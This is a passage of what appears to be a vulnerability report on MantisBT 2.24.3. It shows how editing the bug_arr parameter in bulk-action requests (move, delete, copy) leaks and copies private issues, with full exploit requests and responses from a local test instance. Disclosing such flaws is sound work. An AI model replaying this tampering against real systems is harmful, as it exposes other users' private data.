Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 95 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8 Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 bug_actiongroup_page_token=20200927VytbpqZq-H6AOMpwgFL3-510O_GESAhb&bug_arr%5B%5D=8&action=MOVE ``` - Just edit the ``bug_arr%5B%5D=`` to ``7`` <- private issue and it will render the summary/title of the issue - ``Delete`` functionality is almost the same **Normal request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 97 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8 Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 bug_actiongroup_page_token=202009278EV6inaVGOOm_NWIFfBv911-mp-b93-g&bug_arr%5B%5D=8&action=DELETE ``` - Take note you can't move/delete these issues, it returns ``You did not have appropriate permissions to perform that action.`` however its too late, the summary/title already leaked.. ### Copying issues : For fun fun fun! - In this part the attacker manage to **fully leaked** the issues - As malicious actor go to [http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184](http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184) - You can see the ``Viewing issues`` part and the ``select all`` checkbox and a dropdown.. - The problem on this dropdown is the ``Copy`` functionality > Note : I notice that the ``Assigned to Me (Unresolved)`` have different number of parameters,the ``bug_arr_all=all`` is required, go select the ``Assigned to Me (Unresolved)`` compare to ``unassigned`` which doesn't have ``bug_arr_all=all`` **Normal request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 43 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8 Upgrade-Insecure-Requests: 1 bug_arr%5B%5D=8&bug_arr_all=all&action=COPY ``` **Normal response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:50:18 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:50:18 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:50:18 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 11551 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>MantisBT</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> first project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/changelog_page.php"> <i class="menu-icon fa fa-retweet"></i> <span class="menu-text"> Change Log </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php"> <i class="menu-icon fa fa-road"></i> <span class="menu-text"> Roadmap </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/summary_page.php"> <i class="menu-icon fa fa-bar-chart-o"></i> <span class="menu-text"> Summary </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a> <span class="label hidden-xs label-default arrowed">manager</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=10" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000010</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="col-md-12 col-xs-12"> <div id="action-group-div" class="form-container"> <form method="post" action="bug_actiongroup.php"> <input type="hidden" name="bug_actiongroup_COPY_token" value="20200927tSfUmsUZ6RBtNUVr78zlF6QZ6wmCIpSR"/> <input type="hidden" name="action" value="COPY" /> <input type="hidden" name="bug_arr[]" value="8" /> <div class="widget-box widget-color-blue2"> <div class="widget-header widget-header-small"> <h4 class="widget-title lighter"> Copy issues to </h4> </div> <div class="widget-body"> <div class="widget-main no-padding"> <div class="table-responsive"> <table class="table table-bordered table-condensed table-striped"> <tbody> <tr> <th class="category"> Copy issues to </th> <td> <select name="project_id" class="input-sm" required><option value="1">first project</option> </select> </td> </tr> <tr class="spacer"></tr> <tr><th class="category" colspan="2">Selected Issues</th></tr><tr> <td><i class="fa fa-square fa-status-box status-50-fg"></i> <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a></td> <td>Hello I am the attacker</td> </tr> <tr class="spacer"></tr> </tbody> </table> </div> </div> <div class="widget-toolbox padding-8 clearfix"> <input type="submit" class="btn btn-primary btn-white btn-round" value="Copy Issues" /> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html> ``` - Change the value of ``bug_arr%5B%5D=`` to ``7`` **Exploit request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 43 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8 Upgrade-Insecure-Requests: 1 bug_arr%5B%5D=7&bug_arr_all=all&action=COPY ``` **Exploit response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:51:40 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:51:40 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:51:40 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 11070 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>MantisBT</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> second project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a> <span class="label hidden-xs label-default arrowed">manager</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=10" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000010</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="col-md-12 col-xs-12"> <div id="action-group-div" class="form-container"> <form method="post" action="bug_actiongroup.php"> <input type="hidden" name="bug_actiongroup_COPY_token" value="20200927YQX5myIJlc0m_RVH6oqWVPd02Z4ncKwU"/> <input type="hidden" name="action" value="COPY" /> <input type="hidden" name="bug_arr[]" value="7" /> <div class="widget-box widget-color-blue2"> <div class="widget-header widget-header-small"> <h4 class="widget-title lighter"> Copy issues to </h4> </div> <div class="widget-body"> <div class="widget-main no-padding"> <div class="table-responsive"> <table class="table table-bordered table-condensed table-striped"> <tbody> <tr> <th class="category"> Copy issues to </th> <td> <select name="project_id" class="input-sm" required><option value="1">first project</option> </select> </td> </tr> <tr class="spacer"></tr> <tr><th class="category" colspan="2">Selected Issues</th></tr><tr> <td><i class="fa fa-square fa-status-box status-50-fg"></i> <a href="/mantisbt/mantisbt-2.24.3/view.php?id=7" title="[assigned] This is my private issue please dont access me">0000007</a></td> <td>This is my private issue please dont access me</td> </tr> <tr class="spacer"></tr> </tbody> </table> </div> </div> <div class="widget-toolbox padding-8 clearfix"> <input type="submit" class="btn btn-primary btn-white btn-round" value="Copy Issues" /> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html> ``` - It will redirect to ``bug_actiongroup_page.php`` - Click the ``Copy issues`` **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=10%2C6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 bug_actiongroup_COPY_token=202009271-2rIHMkDM1rpzJGjW1dFUysY9Sqp-5m&action=COPY&bug_arr%5B%5D=7&project_id=1 ``` **Response** ``` HTTP/1.1 302 Found Date: Sat, 26 Sep 2020 23:56:39 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:56:39 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:56:39 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Location: 